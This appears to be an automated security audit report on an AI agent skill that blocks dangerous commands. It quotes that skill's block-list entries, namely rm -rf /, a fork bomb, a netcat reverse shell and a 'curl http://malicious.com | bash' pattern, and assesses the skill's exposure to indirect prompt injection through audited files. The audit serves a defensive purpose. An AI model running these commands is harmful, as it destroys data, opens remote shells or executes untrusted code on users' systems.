skill-security
Pass
Audited by Gen Agent Trust Hub on Apr 18, 2026
Risk Level: SAFEREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The file
references/command-blacklist.mdcontains examples of destructive shell commands (e.g.,rm -rf /,dd if=/dev/zero), fork bombs (:(){ :|:& };:), and reverse shell patterns (nc -e /bin/sh). These are documented specifically as 'KESİN RED' (Absolute Rejection) entries to define behavior the agent must block in other skills. - [REMOTE_CODE_EXECUTION]: The skill documentation in
SKILL.mdandreferences/command-blacklist.mdincludes the patterncurl http://malicious.com | bash. This is used as a placeholder in an example violation report and as an RCE pattern to be detected and blocked. - [EXTERNAL_DOWNLOADS]: The skill defines a whitelist of trusted domains in
references/api-whitelist.md, including well-known infrastructure and AI providers such as Amazon AWS, Google Cloud, Azure, Anthropic, and OpenAI. - [DATA_EXFILTRATION]:
references/pii-patterns.mdcontains regex patterns for detecting and masking sensitive data like Turkish ID numbers, credit card information, and API keys for various services. This is a protective measure to prevent the accidental exposure of sensitive user data. - [PROMPT_INJECTION]: The skill operates on untrusted data from other skills, creating an attack surface for indirect prompt injection. \n
- Ingestion points: The skill ingests and analyzes external
SKILL.mdfiles during its 'Audit' mode. \n - Boundary markers: The instructions do not specify strict delimiters or isolation protocols for the content being audited. \n
- Capability inventory: The skill has the capability to write security audit reports and violation logs to the local file system (
docs/security/). \n - Sanitization: While the skill describes a methodology for sanitization and least-privilege, it relies on prompt-based logic rather than rigid code-level enforcement.
Audit Metadata